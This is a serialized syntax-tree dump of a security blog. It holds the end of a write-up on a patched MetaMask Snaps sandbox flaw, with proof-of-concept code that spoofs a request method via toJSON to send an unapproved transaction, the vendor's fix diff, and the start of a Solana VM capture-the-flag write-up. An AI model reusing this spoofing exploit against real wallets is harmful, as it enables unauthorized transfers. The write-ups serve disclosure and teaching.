",{"type":26,"tag":137,"props":42295,"children":42296},{"style":5573},[42297],{"type":32,"value":17413},{"type":26,"tag":137,"props":42299,"children":42300},{"style":5601},[42301],{"type":32,"value":5875},{"type":26,"tag":137,"props":42303,"children":42304},{"class":5559,"line":5930},[42305,42309],{"type":26,"tag":137,"props":42306,"children":42307},{"style":5610},[42308],{"type":32,"value":19582},{"type":26,"tag":137,"props":42310,"children":42311},{"style":5601},[42312],{"type":32,"value":5875},{"type":26,"tag":137,"props":42314,"children":42315},{"class":5559,"line":5939},[42316,42321,42326],{"type":26,"tag":137,"props":42317,"children":42318},{"style":5584},[42319],{"type":32,"value":42320},"      method:",{"type":26,"tag":137,"props":42322,"children":42323},{"style":6837},[42324],{"type":32,"value":42325}," \"eth_requestAccounts\"",{"type":26,"tag":137,"props":42327,"children":42328},{"style":5601},[42329],{"type":32,"value":6099},{"type":26,"tag":137,"props":42331,"children":42332},{"class":5559,"line":6191},[42333,42338],{"type":26,"tag":137,"props":42334,"children":42335},{"style":5584},[42336],{"type":32,"value":42337},"      params:",{"type":26,"tag":137,"props":42339,"children":42340},{"style":5601},[42341],{"type":32,"value":42342}," []\n",{"type":26,"tag":137,"props":42344,"children":42345},{"class":5559,"line":6208},[42346],{"type":26,"tag":137,"props":42347,"children":42348},{"style":5601},[42349],{"type":32,"value":5945},{"type":26,"tag":137,"props":42351,"children":42352},{"class":5559,"line":6225},[42353],{"type":26,"tag":137,"props":42354,"children":42355},{"style":5601},[42356],{"type":32,"value":8457},{"type":26,"tag":137,"props":42358,"children":42359},{"class":5559,"line":6238},[42360],{"type":26,"tag":137,"props":42361,"children":42362},{"emptyLinePlaceholder":18},[42363],{"type":32,"value":6276},{"type":26,"tag":137,"props":42365,"children":42366},{"class":5559,"line":6247},[42367,42371,42376,42380,42384,42388,42392],{"type":26,"tag":137,"props":42368,"children":42369},{"style":5610},[42370],{"type":32,"value":41795},{"type":26,"tag":137,"props":42372,"children":42373},{"style":5584},[42374],{"type":32,"value":42375}," snap",{"type":26,"tag":137,"props":42377,"children":42378},{"style":5601},[42379],{"type":32,"value":470},{"type":26,"tag":137,"props":42381,"children":42382},{"style":5682},[42383],{"type":32,"value":34088},{"type":26,"tag":137,"props":42385,"children":42386},{"style":5601},[42387],{"type":32,"value":165},{"type":26,"tag":137,"props":42389,"children":42390},{"style":5584},[42391],{"type":32,"value":173},{"type":26,"tag":137,"props":42393,"children":42394},{"style":5601},[42395],{"type":32,"value":5742},{"type":26,"tag":137,"props":42397,"children":42398},{"class":5559,"line":6270},[42399],{"type":26,"tag":137,"props":42400,"children":42401},{"emptyLinePlaceholder":18},[42402],{"type":32,"value":6276},{"type":26,"tag":137,"props":42404,"children":42405},{"class":5559,"line":6279},[42406],{"type":26,"tag":137,"props":42407,"children":42408},{"style":5601},[42409],{"type":32,"value":6507},{"type":26,"tag":137,"props":42411,"children":42412},{"class":5559,"line":6288},[42413],{"type":26,"tag":137,"props":42414,"children":42415},{"emptyLinePlaceholder":18},[42416],{"type":32,"value":6276},{"type":26,"tag":137,"props":42418,"children":42419},{"class":5559,"line":6355},[42420,42424,42429],{"type":26,"tag":137,"props":42421,"children":42422},{"style":5573},[42423],{"type":32,"value":33972},{"type":26,"tag":137,"props":42425,"children":42426},{"style":5682},[42427],{"type":32,"value":42428}," transactionExploit",{"type":26,"tag":137,"props":42430,"children":42431},{"style":5601},[42432],{"type":32,"value":42201},{"type":26,"tag":137,"props":42434,"children":42435},{"class":5559,"line":6363},[42436,42440,42444,42448,42452,42456],{"type":26,"tag":137,"props":42437,"children":42438},{"style":5573},[42439],{"type":32,"value":10440},{"type":26,"tag":137,"props":42441,"children":42442},{"style":5584},[42443],{"type":32,"value":21658},{"type":26,"tag":137,"props":42445,"children":42446},{"style":5590},[42447],{"type":32,"value":5593},{"type":26,"tag":137,"props":42449,"children":42450},{"style":5601},[42451],{"type":32,"value":42221},{"type":26,"tag":137,"props":42453,"children":42454},{"style":5610},[42455],{"type":32,"value":11428},{"type":26,"tag":137,"props":42457,"children":42458},{"style":6009},[42459],{"type":32,"value":42230},{"type":26,"tag":137,"props":42461,"children":42462},{"class":5559,"line":6393},[42463],{"type":26,"tag":137,"props":42464,"children":42465},{"emptyLinePlaceholder":18},[42466],{"type":32,"value":6276},{"type":26,"tag":137,"props":42468,"children":42469},{"class":5559,"line":6401},[42470,42474,42478,42482,42486],{"type":26,"tag":137,"props":42471,"children":42472},{"style":5584},[42473],{"type":32,"value":42245},{"type":26,"tag":137,"props":42475,"children":42476},{"style":5601},[42477],{"type":32,"value":470},{"type":26,"tag":137,"props":42479,"children":42480},{"style":5584},[42481],{"type":32,"value":40909},{"type":26,"tag":137,"props":42483,"children":42484},{"style":5590},[42485],{"type":32,"value":5593},{"type":26,"tag":137,"props":42487,"children":42488},{"style":6837},[42489],{"type":32,"value":42262},{"type":26,"tag":137,"props":42491,"children":42492},{"class":5559,"line":6433},[42493],{"type":26,"tag":137,"props":42494,"children":42495},{"emptyLinePlaceholder":18},[42496],{"type":32,"value":6276},{"type":26,"tag":137,"props":42498,"children":42499},{"class":5559,"line":6441},[42500,42504,42508,42512,42516,42520,42524],{"type":26,"tag":137,"props":42501,"children":42502},{"style":5584},[42503],{"type":32,"value":42245},{"type":26,"tag":137,"props":42505,"children":42506},{"style":5601},[42507],{"type":32,"value":470},{"type":26,"tag":137,"props":42509,"children":42510},{"style":5682},[42511],{"type":32,"value":42009},{"type":26,"tag":137,"props":42513,"children":42514},{"style":5590},[42515],{"type":32,"value":5593},{"type":26,"tag":137,"props":42517,"children":42518},{"style":5601},[42519],{"type":32,"value":42293},{"type":26,"tag":137,"props":42521,"children":42522},{"style":5573},[42523],{"type":32,"value":17413},{"type":26,"tag":137,"props":42525,"children":42526},{"style":5601},[42527],{"type":32,"value":5875},{"type":26,"tag":137,"props":42529,"children":42530},{"class":5559,"line":6501},[42531,42535],{"type":26,"tag":137,"props":42532,"children":42533},{"style":5610},[42534],{"type":32,"value":19582},{"type":26,"tag":137,"props":42536,"children":42537},{"style":5601},[42538],{"type":32,"value":5875},{"type":26,"tag":137,"props":42540,"children":42541},{"class":5559,"line":11634},[42542,42546,42551],{"type":26,"tag":137,"props":42543,"children":42544},{"style":5584},[42545],{"type":32,"value":42320},{"type":26,"tag":137,"props":42547,"children":42548},{"style":6837},[42549],{"type":32,"value":42550}," \"eth_sendTransaction\"",{"type":26,"tag":137,"props":42552,"children":42553},{"style":5601},[42554],{"type":32,"value":6099},{"type":26,"tag":137,"props":42556,"children":42557},{"class":5559,"line":11652},[42558,42562],{"type":26,"tag":137,"props":42559,"children":42560},{"style":5584},[42561],{"type":32,"value":42337},{"type":26,"tag":137,"props":42563,"children":42564},{"style":5601},[42565],{"type":32,"value":42566}," [{\n",{"type":26,"tag":137,"props":42568,"children":42569},{"class":5559,"line":11697},[42570,42574,42579,42583],{"type":26,"tag":137,"props":42571,"children":42572},{"style":5584},[42573],{"type":32,"value":34660},{"type":26,"tag":137,"props":42575,"children":42576},{"style":6837},[42577],{"type":32,"value":42578}," \"0xcf26B767586cC5fCF8737dD3FA57de164aF4248d\"",{"type":26,"tag":137,"props":42580,"children":42581},{"style":5601},[42582],{"type":32,"value":1108},{"type":26,"tag":137,"props":42584,"children":42585},{"style":5564},[42586],{"type":32,"value":42587},"// change this to your address\n",{"type":26,"tag":137,"props":42589,"children":42590},{"class":5559,"line":11803},[42591,42595,42599],{"type":26,"tag":137,"props":42592,"children":42593},{"style":5584},[42594],{"type":32,"value":34676},{"type":26,"tag":137,"props":42596,"children":42597},{"style":6837},[42598],{"type":32,"value":42578},{"type":26,"tag":137,"props":42600,"children":42601},{"style":5601},[42602],{"type":32,"value":6099},{"type":26,"tag":137,"props":42604,"children":42605},{"class":5559,"line":26089},[42606,42611,42616],{"type":26,"tag":137,"props":42607,"children":42608},{"style":5584},[42609],{"type":32,"value":42610},"        value:",{"type":26,"tag":137,"props":42612,"children":42613},{"style":6837},[42614],{"type":32,"value":42615}," \"0x1\"",{"type":26,"tag":137,"props":42617,"children":42618},{"style":5601},[42619],{"type":32,"value":6099},{"type":26,"tag":137,"props":42621,"children":42622},{"class":5559,"line":26124},[42623],{"type":26,"tag":137,"props":42624,"children":42625},{"style":5601},[42626],{"type":32,"value":42627},"      }]\n",{"type":26,"tag":137,"props":42629,"children":42630},{"class":5559,"line":26132},[42631],{"type":26,"tag":137,"props":42632,"children":42633},{"style":5601},[42634],{"type":32,"value":5945},{"type":26,"tag":137,"props":42636,"children":42637},{"class":5559,"line":26140},[42638],{"type":26,"tag":137,"props":42639,"children":42640},{"style":5601},[42641],{"type":32,"value":8457},{"type":26,"tag":137,"props":42643,"children":42644},{"class":5559,"line":26149},[42645],{"type":26,"tag":137,"props":42646,"children":42647},{"emptyLinePlaceholder":18},[42648],{"type":32,"value":6276},{"type":26,"tag":137,"props":42650,"children":42651},{"class":5559,"line":26191},[42652,42656,42660,42664,42668,42672,42676],{"type":26,"tag":137,"props":42653,"children":42654},{"style":5610},[42655],{"type":32,"value":41795},{"type":26,"tag":137,"props":42657,"children":42658},{"style":5584},[42659],{"type":32,"value":42375},{"type":26,"tag":137,"props":42661,"children":42662},{"style":5601},[42663],{"type":32,"value":470},{"type":26,"tag":137,"props":42665,"children":42666},{"style":5682},[42667],{"type":32,"value":34088},{"type":26,"tag":137,"props":42669,"children":42670},{"style":5601},[42671],{"type":32,"value":165},{"type":26,"tag":137,"props":42673,"children":42674},{"style":5584},[42675],{"type":32,"value":173},{"type":26,"tag":137,"props":42677,"children":42678},{"style":5601},[42679],{"type":32,"value":6430},{"type":26,"tag":137,"props":42681,"children":42682},{"class":5559,"line":26224},[42683],{"type":26,"tag":137,"props":42684,"children":42685},{"style":5601},[42686],{"type":32,"value":6507},{"type":26,"tag":137,"props":42688,"children":42689},{"class":5559,"line":26232},[42690],{"type":26,"tag":137,"props":42691,"children":42692},{"emptyLinePlaceholder":18},[42693],{"type":32,"value":6276},{"type":26,"tag":137,"props":42695,"children":42696},{"class":5559,"line":26240},[42697,42701,42705,42710,42714,42719,42723,42728,42733,42737,42741,42746,42750],{"type":26,"tag":137,"props":42698,"children":42699},{"style":5610},[42700],{"type":32,"value":40805},{"type":26,"tag":137,"props":42702,"children":42703},{"style":5573},[42704],{"type":32,"value":41707},{"type":26,"tag":137,"props":42706,"children":42707},{"style":5682},[42708],{"type":32,"value":42709}," onRpcRequest",{"type":26,"tag":137,"props":42711,"children":42712},{"style":5590},[42713],{"type":32,"value":7072},{"type":26,"tag":137,"props":42715,"children":42716},{"style":6009},[42717],{"type":32,"value":42718}," OnRpcRequestHandler",{"type":26,"tag":137,"props":42720,"children":42721},{"style":5590},[42722],{"type":32,"value":5593},{"type":26,"tag":137,"props":42724,"children":42725},{"style":5601},[42726],{"type":32,"value":42727}," ({ ",{"type":26,"tag":137,"props":42729,"children":42730},{"style":5584},[42731],{"type":32,"value":42732},"origin",{"type":26,"tag":137,"props":42734,"children":42735},{"style":5601},[42736],{"type":32,"value":1108},{"type":26,"tag":137,"props":42738,"children":42739},{"style":5584},[42740],{"type":32,"value":34088},{"type":26,"tag":137,"props":42742,"children":42743},{"style":5601},[42744],{"type":32,"value":42745}," }) ",{"type":26,"tag":137,"props":42747,"children":42748},{"style":5573},[42749],{"type":32,"value":17413},{"type":26,"tag":137,"props":42751,"children":42752},{"style":5601},[42753],{"type":32,"value":5875},{"type":26,"tag":137,"props":42755,"children":42756},{"class":5559,"line":26249},[42757],{"type":26,"tag":137,"props":42758,"children":42759},{"emptyLinePlaceholder":18},[42760],{"type":32,"value":6276},{"type":26,"tag":137,"props":42762,"children":42763},{"class":5559,"line":26325},[42764,42769,42773,42777,42781,42785],{"type":26,"tag":137,"props":42765,"children":42766},{"style":5610},[42767],{"type":32,"value":42768},"  switch",{"type":26,"tag":137,"props":42770,"children":42771},{"style":5601},[42772],{"type":32,"value":4625},{"type":26,"tag":137,"props":42774,"children":42775},{"style":5584},[42776],{"type":32,"value":34088},{"type":26,"tag":137,"props":42778,"children":42779},{"style":5601},[42780],{"type":32,"value":470},{"type":26,"tag":137,"props":42782,"children":42783},{"style":5584},[42784],{"type":32,"value":40909},{"type":26,"tag":137,"props":42786,"children":42787},{"style":5601},[42788],{"type":32,"value":17395},{"type":26,"tag":137,"props":42790,"children":42791},{"class":5559,"line":26358},[42792,42797,42802],{"type":26,"tag":137,"props":42793,"children":42794},{"style":5610},[42795],{"type":32,"value":42796},"    case",{"type":26,"tag":137,"props":42798,"children":42799},{"style":6837},[42800],{"type":32,"value":42801}," 'json'",{"type":26,"tag":137,"props":42803,"children":42804},{"style":5601},[42805],{"type":32,"value":8152},{"type":26,"tag":137,"props":42807,"children":42808},{"class":5559,"line":26366},[42809,42813,42817],{"type":26,"tag":137,"props":42810,"children":42811},{"style":5610},[42812],{"type":32,"value":41953},{"type":26,"tag":137,"props":42814,"children":42815},{"style":5682},[42816],{"type":32,"value":42196},{"type":26,"tag":137,"props":42818,"children":42819},{"style":5601},[42820],{"type":32,"value":6267},{"type":26,"tag":137,"props":42822,"children":42823},{"class":5559,"line":26374},[42824,42828,42833],{"type":26,"tag":137,"props":42825,"children":42826},{"style":5610},[42827],{"type":32,"value":42796},{"type":26,"tag":137,"props":42829,"children":42830},{"style":6837},[42831],{"type":32,"value":42832}," 'transaction'",{"type":26,"tag":137,"props":42834,"children":42835},{"style":5601},[42836],{"type":32,"value":8152},{"type":26,"tag":137,"props":42838,"children":42839},{"class":5559,"line":26411},[42840,42844,42848],{"type":26,"tag":137,"props":42841,"children":42842},{"style":5610},[42843],{"type":32,"value":41953},{"type":26,"tag":137,"props":42845,"children":42846},{"style":5682},[42847],{"type":32,"value":42428},{"type":26,"tag":137,"props":42849,"children":42850},{"style":5601},[42851],{"type":32,"value":6267},{"type":26,"tag":137,"props":42853,"children":42854},{"class":5559,"line":26424},[42855,42860],{"type":26,"tag":137,"props":42856,"children":42857},{"style":5610},[42858],{"type":32,"value":42859},"    default",{"type":26,"tag":137,"props":42861,"children":42862},{"style":5601},[42863],{"type":32,"value":8152},{"type":26,"tag":137,"props":42865,"children":42866},{"class":5559,"line":26437},[42867,42872,42876,42881,42885,42890],{"type":26,"tag":137,"props":42868,"children":42869},{"style":5610},[42870],{"type":32,"value":42871},"      throw",{"type":26,"tag":137,"props":42873,"children":42874},{"style":5573},[42875],{"type":32,"value":34528},{"type":26,"tag":137,"props":42877,"children":42878},{"style":5682},[42879],{"type":32,"value":42880}," Error",{"type":26,"tag":137,"props":42882,"children":42883},{"style":5601},[42884],{"type":32,"value":165},{"type":26,"tag":137,"props":42886,"children":42887},{"style":6837},[42888],{"type":32,"value":42889},"'Method not found.'",{"type":26,"tag":137,"props":42891,"children":42892},{"style":5601},[42893],{"type":32,"value":6430},{"type":26,"tag":137,"props":42895,"children":42896},{"class":5559,"line":26450},[42897],{"type":26,"tag":137,"props":42898,"children":42899},{"style":5601},[42900],{"type":32,"value":8457},{"type":26,"tag":137,"props":42902,"children":42903},{"class":5559,"line":26504},[42904],{"type":26,"tag":137,"props":42905,"children":42906},{"style":5601},[42907],{"type":32,"value":19170},{"type":26,"tag":35,"props":42909,"children":42910},{},[42911,42913,42919,42921,42926],{"type":32,"value":42912},"We set ",{"type":26,"tag":130,"props":42914,"children":42916},{"className":42915},[],[42917],{"type":32,"value":42918},"x.method = \"snap_dialog\"",{"type":32,"value":42920}," to pass the assertion and setup a toJSON function to change this method to ",{"type":26,"tag":130,"props":42922,"children":42924},{"className":42923},[],[42925],{"type":32,"value":42128},{"type":32,"value":42927}," after.",{"type":26,"tag":118,"props":42929,"children":42931},{"id":42930},"mitigation",[42932],{"type":32,"value":42933},"Mitigation",{"type":26,"tag":35,"props":42935,"children":42936},{},[42937,42939,42944,42946,42953],{"type":32,"value":42938},"Metamask mitigated this issue by asserting the arguments after the ",{"type":26,"tag":130,"props":42940,"children":42942},{"className":42941},[],[42943],{"type":32,"value":41672},{"type":32,"value":42945}," function execution. The patch was introduced on commit ",{"type":26,"tag":41,"props":42947,"children":42950},{"href":42948,"rel":42949},"https://github.com/MetaMask/snaps/pull/1762/commits/168ff082102a65e2aad428f44c5b10f9a100c689",[45],[42951],{"type":32,"value":42952},"168ff08",{"type":32,"value":42954}," with the following changes:",{"type":26,"tag":5512,"props":42956,"children":42960},{"className":42957,"code":42958,"language":42959,"meta":7,"style":7},"language-diff shiki shiki-themes slack-dark","const request = async (args: RequestArguments) => {\n-      assertEthereumOutboundRequest(args);\n-      const sanitizedArgs = getSafeJson(args);\n+      const sanitizedArgs = getSafeJson(args) as RequestArguments;\n+      assertEthereumOutboundRequest(sanitizedArgs);\n","diff",[42961],{"type":26,"tag":130,"props":42962,"children":42963},{"__ignoreMap":7},[42964,42972,42980,42988,42996],{"type":26,"tag":137,"props":42965,"children":42966},{"class":5559,"line":5560},[42967],{"type":26,"tag":137,"props":42968,"children":42969},{"style":5601},[42970],{"type":32,"value":42971},"const request = async (args: RequestArguments) => {\n",{"type":26,"tag":137,"props":42973,"children":42974},{"class":5559,"line":5412},[42975],{"type":26,"tag":137,"props":42976,"children":42977},{"style":6837},[42978],{"type":32,"value":42979},"-      assertEthereumOutboundRequest(args);\n",{"type":26,"tag":137,"props":42981,"children":42982},{"class":5559,"line":5417},[42983],{"type":26,"tag":137,"props":42984,"children":42985},{"style":6837},[42986],{"type":32,"value":42987},"-      const sanitizedArgs = getSafeJson(args);\n",{"type":26,"tag":137,"props":42989,"children":42990},{"class":5559,"line":5642},[42991],{"type":26,"tag":137,"props":42992,"children":42993},{"style":5626},[42994],{"type":32,"value":42995},"+      const sanitizedArgs = getSafeJson(args) as RequestArguments;\n",{"type":26,"tag":137,"props":42997,"children":42998},{"class":5559,"line":5745},[42999],{"type":26,"tag":137,"props":43000,"children":43001},{"style":5626},[43002],{"type":32,"value":43003},"+      assertEthereumOutboundRequest(sanitizedArgs);\n",{"type":26,"tag":92,"props":43005,"children":43006},{"id":31526},[43007],{"type":32,"value":21540},{"type":26,"tag":35,"props":43009,"children":43010},{},[43011],{"type":32,"value":43012},"This unique property spoofing vulnerability in the Snaps sandboxing implementation illustrates the wide range of control attackers have in Javascript, which makes designing robust sandbox implementations an extremely complex task.",{"type":26,"tag":35,"props":43014,"children":43015},{},[43016],{"type":32,"value":43017},"Metamask has implemented numerous layers to mitigate potential exploits, and we're proud to help contribute to making Snaps more secure.",{"type":26,"tag":7949,"props":43019,"children":43020},{},[43021],{"type":32,"value":7953},{"title":7,"searchDepth":5412,"depth":5412,"links":43023},[43024,43025,43032,43040],{"id":21549,"depth":5412,"text":21552},{"id":38048,"depth":5412,"text":38051,"children":43026},[43027,43028,43029,43030,43031],{"id":38059,"depth":5417,"text":38062},{"id":38127,"depth":5417,"text":38130},{"id":38163,"depth":5417,"text":38166},{"id":39559,"depth":5417,"text":39562},{"id":39917,"depth":5417,"text":39920},{"id":40704,"depth":5412,"text":40707,"children":43033},[43034,43035,43036,43037,43038,43039],{"id":40710,"depth":5417,"text":40713},{"id":40754,"depth":5417,"text":40757},{"id":41658,"depth":5417,"text":41661},{"id":8246,"depth":5417,"text":8249},{"id":42101,"depth":5417,"text":37425},{"id":42930,"depth":5417,"text":42933},{"id":31526,"depth":5412,"text":21540},"content:blog:2023-11-01-metamask-snaps.md","blog/2023-11-01-metamask-snaps.md","blog/2023-11-01-metamask-snaps",{"_path":43045,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":43046,"description":43047,"author":43048,"image":43050,"date":43052,"isFeatured":18,"onBlogPage":18,"body":43053,"_type":5433,"_id":48473,"_source":5435,"_file":48474,"_stem":48475,"_extension":5438},"/blog/2023-12-11-jumping-around-in-the-vm","Solana: Jumping Around in the VM","An exploration of low-level Solana VM behavior. How to escalate from a powerful memory corruption primitive to full program control.",[43049,8304],"nicola",{"src":43051},"/posts/jumping-around-in-the-vm/cover.png","2023-12-11",{"type":23,"children":43054,"toc":48462},[43055,43069,43089,43094,43098,43111,43136,43142,43147,43162,43516,43531,43796,43812,44455,44461,44466,44479,44487,44699,44707,45010,45018,45161,45169,45694,45700,45712,45725,45739,45744,46512,46517,46525,46530,46536,46548,46613,46618,46631,46644,46650,46678,47829,47842,47884,47889,47894,47908,48048,48069,48090,48097,48148,48156,48167,48180,48185,48309,48322,48424,48428,48441,48446,48458],{"type":26,"tag":35,"props":43056,"children":43057},{},[43058,43060,43067],{"type":32,"value":43059},"In the world of CTFs, ",{"type":26,"tag":41,"props":43061,"children":43064},{"href":43062,"rel":43063},"https://twitter.com/paradigm_ctf",[45],[43065],{"type":32,"value":43066},"Paradigm CTF 2023",{"type":32,"value":43068}," was like no other. Presenting a unique Solana challenge, the goal was to leverage Jump Oriented Programming, a web2 binary exploitation technique, inside the Solana VM to achieve arbitrary CPI execution.",{"type":26,"tag":35,"props":43070,"children":43071},{},[43072,43074,43081,43082],{"type":32,"value":43073},"To succeed in this challenge, a strong understanding of the Solana VM is required. We've explored parts of the Solana VM internals in two previous blog posts: ",{"type":26,"tag":41,"props":43075,"children":43078},{"href":43076,"rel":43077},"https://osec.io/blog/2022-03-14-solana-security-intro",[45],[43079],{"type":32,"value":43080},"Solana: An Auditor's Introduction",{"type":32,"value":3339},{"type":26,"tag":41,"props":43083,"children":43086},{"href":43084,"rel":43085},"https://osec.io/blog/2022-08-27-reverse-engineering-solana",[45],[43087],{"type":32,"value":43088},"Reverse Engineering Solana with Binary Ninja.\n",{"type":26,"tag":35,"props":43090,"children":43091},{},[43092],{"type":32,"value":43093},"In this comprehensive overview, we'll break down critical components of the Solana BPF VM necessary to write a complete memory-corruption exploit. We then turn an arbitrary function call and memory write primitive into a full exploit.",{"type":26,"tag":92,"props":43095,"children":43096},{"id":21549},[43097],{"type":32,"value":21552},{"type":26,"tag":35,"props":43099,"children":43100},{},[43101,43103,43109],{"type":32,"value":43102},"The challenge itself resides into ",{"type":26,"tag":130,"props":43104,"children":43106},{"className":43105},[],[43107],{"type":32,"value":43108},"framework/",{"type":32,"value":43110},", and is composed of 2 parts:",{"type":26,"tag":3426,"props":43112,"children":43113},{},[43114,43125],{"type":26,"tag":3430,"props":43115,"children":43116},{},[43117,43123],{"type":26,"tag":130,"props":43118,"children":43120},{"className":43119},[],[43121],{"type":32,"value":43122},"framework/chall/lib.rs",{"type":32,"value":43124},": The on-chain eBPF program that needs to be exploited.",{"type":26,"tag":3430,"props":43126,"children":43127},{},[43128,43134],{"type":26,"tag":130,"props":43129,"children":43131},{"className":43130},[],[43132],{"type":32,"value":43133},"framework/src/main.rs",{"type":32,"value":43135},": Program that setups a solana test environment, gets a single instruction and make it possible to users to interact with the on-chain program.",{"type":26,"tag":118,"props":43137,"children":43139},{"id":43138},"vulnerable-program",[43140],{"type":32,"value":43141},"Vulnerable Program",{"type":26,"tag":35,"props":43143,"children":43144},{},[43145],{"type":32,"value":43146},"The program is simple: it parses the input data and does something based on the first byte. Each potential action is quite out of the ordinary though!",{"type":26,"tag":4820,"props":43148,"children":43149},{},[43150],{"type":26,"tag":3430,"props":43151,"children":43152},{},[43153,43154,43160],{"type":32,"value":10064},{"type":26,"tag":130,"props":43155,"children":43157},{"className":43156},[],[43158],{"type":32,"value":43159},"data[0] == 0",{"type":32,"value":43161}," a function that lets you write-what-where is executed",{"type":26,"tag":5512,"props":43163,"children":43165},{"className":5552,"code":43164,"language":5551,"meta":7,"style":7},"#[inline(never)]\npub fn write(data: &[u8]) {\n    unsafe {\n        let ptr = std::mem::transmute::\u003C[u8; 8], *mut u64>(data[..8].try_into().unwrap());\n        let val = std::mem::transmute::\u003C[u8; 8], u64>(data[8..16].try_into().unwrap());\n        ptr.write_volatile(val);\n    }\n}\n",[43166],{"type":26,"tag":130,"props":43167,"children":43168},{"__ignoreMap":7},[43169,43177,43222,43233,43356,43473,43502,43509],{"type":26,"tag":137,"props":43170,"children":43171},{"class":5559,"line":5560},[43172],{"type":26,"tag":137,"props":43173,"children":43174},{"style":5601},[43175],{"type":32,"value":43176},"#[inline(never)]\n",{"type":26,"tag":137,"props":43178,"children":43179},{"class":5559,"line":5412},[43180,43184,43188,43193,43197,43201,43205,43209,43213,43217],{"type":26,"tag":137,"props":43181,"children":43182},{"style":5573},[43183],{"type":32,"value":16281},{"type":26,"tag":137,"props":43185,"children":43186},{"style":5573},[43187],{"type":32,"value":16286},{"type":26,"tag":137,"props":43189,"children":43190},{"style":5682},[43191],{"type":32,"value":43192}," write",{"type":26,"tag":137,"props":43194,"children":43195},{"style":5601},[43196],{"type":32,"value":165},{"type":26,"tag":137,"props":43198,"children":43199},{"style":5584},[43200],{"type":32,"value":6303},{"type":26,"tag":137,"props":43202,"children":43203},{"style":5590},[43204],{"type":32,"value":7072},{"type":26,"tag":137,"props":43206,"children":43207},{"style":5590},[43208],{"type":32,"value":9725},{"type":26,"tag":137,"props":43210,"children":43211},{"style":5601},[43212],{"type":32,"value":3016},{"type":26,"tag":137,"props":43214,"children":43215},{"style":6009},[43216],{"type":32,"value":6012},{"type":26,"tag":137,"props":43218,"children":43219},{"style":5601},[43220],{"type":32,"value":43221},"]) {\n",{"type":26,"tag":137,"props":43223,"children":43224},{"class":5559,"line":5417},[43225,43229],{"type":26,"tag":137,"props":43226,"children":43227},{"style":5573},[43228],{"type":32,"value":16424},{"type":26,"tag":137,"props":43230,"children":43231},{"style":5601},[43232],{"type":32,"value":5875},{"type":26,"tag":137,"props":43234,"children":43235},{"class":5559,"line":5642},[43236,43240,43244,43248,43253,43257,43262,43266,43271,43275,43280,43284,43288,43292,43296,43300,43304,43308,43312,43316,43320,43324,43328,43332,43336,43340,43344,43348,43352],{"type":26,"tag":137,"props":43237,"children":43238},{"style":5573},[43239],{"type":32,"value":5648},{"type":26,"tag":137,"props":43241,"children":43242},{"style":5584},[43243],{"type":32,"value":16448},{"type":26,"tag":137,"props":43245,"children":43246},{"style":5590},[43247],{"type":32,"value":5593},{"type":26,"tag":137,"props":43249,"children":43250},{"style":5601},[43251],{"type":32,"value":43252}," std",{"type":26,"tag":137,"props":43254,"children":43255},{"style":5590},[43256],{"type":32,"value":6072},{"type":26,"tag":137,"props":43258,"children":43259},{"style":5601},[43260],{"type":32,"value":43261},"mem",{"type":26,"tag":137,"props":43263,"children":43264},{"style":5590},[43265],{"type":32,"value":6072},{"type":26,"tag":137,"props":43267,"children":43268},{"style":5682},[43269],{"type":32,"value":43270},"transmute",{"type":26,"tag":137,"props":43272,"children":43273},{"style":5590},[43274],{"type":32,"value":6072},{"type":26,"tag":137,"props":43276,"children":43277},{"style":5601},[43278],{"type":32,"value":43279},"\u003C[",{"type":26,"tag":137,"props":43281,"children":43282},{"style":6009},[43283],{"type":32,"value":6012},{"type":26,"tag":137,"props":43285,"children":43286},{"style":5601},[43287],{"type":32,"value":19820},{"type":26,"tag":137,"props":43289,"children":43290},{"style":5626},[43291],{"type":32,"value":6663},{"type":26,"tag":137,"props":43293,"children":43294},{"style":5601},[43295],{"type":32,"value":25640},{"type":26,"tag":137,"props":43297,"children":43298},{"style":5590},[43299],{"type":32,"value":7152},{"type":26,"tag":137,"props":43301,"children":43302},{"style":5573},[43303],{"type":32,"value":6325},{"type":26,"tag":137,"props":43305,"children":43306},{"style":6009},[43307],{"type":32,"value":8445},{"type":26,"tag":137,"props":43309,"children":43310},{"style":5601},[43311],{"type":32,"value":10195},{"type":26,"tag":137,"props":43313,"children":43314},{"style":5584},[43315],{"type":32,"value":6303},{"type":26,"tag":137,"props":43317,"children":43318},{"style":5601},[43319],{"type":32,"value":3016},{"type":26,"tag":137,"props":43321,"children":43322},{"style":5590},[43323],{"type":32,"value":5634},{"type":26,"tag":137,"props":43325,"children":43326},{"style":5626},[43327],{"type":32,"value":6663},{"type":26,"tag":137,"props":43329,"children":43330},{"style":5601},[43331],{"type":32,"value":3079},{"type":26,"tag":137,"props":43333,"children":43334},{"style":5590},[43335],{"type":32,"value":470},{"type":26,"tag":137,"props":43337,"children":43338},{"style":5682},[43339],{"type":32,"value":28754},{"type":26,"tag":137,"props":43341,"children":43342},{"style":5601},[43343],{"type":32,"value":16470},{"type":26,"tag":137,"props":43345,"children":43346},{"style":5590},[43347],{"type":32,"value":470},{"type":26,"tag":137,"props":43349,"children":43350},{"style":5682},[43351],{"type":32,"value":6262},{"type":26,"tag":137,"props":43353,"children":43354},{"style":5601},[43355],{"type":32,"value":18016},{"type":26,"tag":137,"props":43357,"children":43358},{"class":5559,"line":5745},[43359,43363,43368,43372,43376,43380,43384,43388,43392,43396,43400,43404,43408,43412,43416,43420,43424,43428,43432,43436,43440,43445,43449,43453,43457,43461,43465,43469],{"type":26,"tag":137,"props":43360,"children":43361},{"style":5573},[43362],{"type":32,"value":5648},{"type":26,"tag":137,"props":43364,"children":43365},{"style":5584},[43366],{"type":32,"value":43367}," val",{"type":26,"tag":137,"props":43369,"children":43370},{"style":5590},[43371],{"type":32,"value":5593},{"type":26,"tag":137,"props":43373,"children":43374},{"style":5601},[43375],{"type":32,"value":43252},{"type":26,"tag":137,"props":43377,"children":43378},{"style":5590},[43379],{"type":32,"value":6072},{"type":26,"tag":137,"props":43381,"children":43382},{"style":5601},[43383],{"type":32,"value":43261},{"type":26,"tag":137,"props":43385,"children":43386},{"style":5590},[43387],{"type":32,"value":6072},{"type":26,"tag":137,"props":43389,"children":43390},{"style":5682},[43391],{"type":32,"value":43270},{"type":26,"tag":137,"props":43393,"children":43394},{"style":5590},[43395],{"type":32,"value":6072},{"type":26,"tag":137,"props":43397,"children":43398},{"style":5601},[43399],{"type":32,"value":43279},{"type":26,"tag":137,"props":43401,"children":43402},{"style":6009},[43403],{"type":32,"value":6012},{"type":26,"tag":137,"props":43405,"children":43406},{"style":5601},[43407],{"type":32,"value":19820},{"type":26,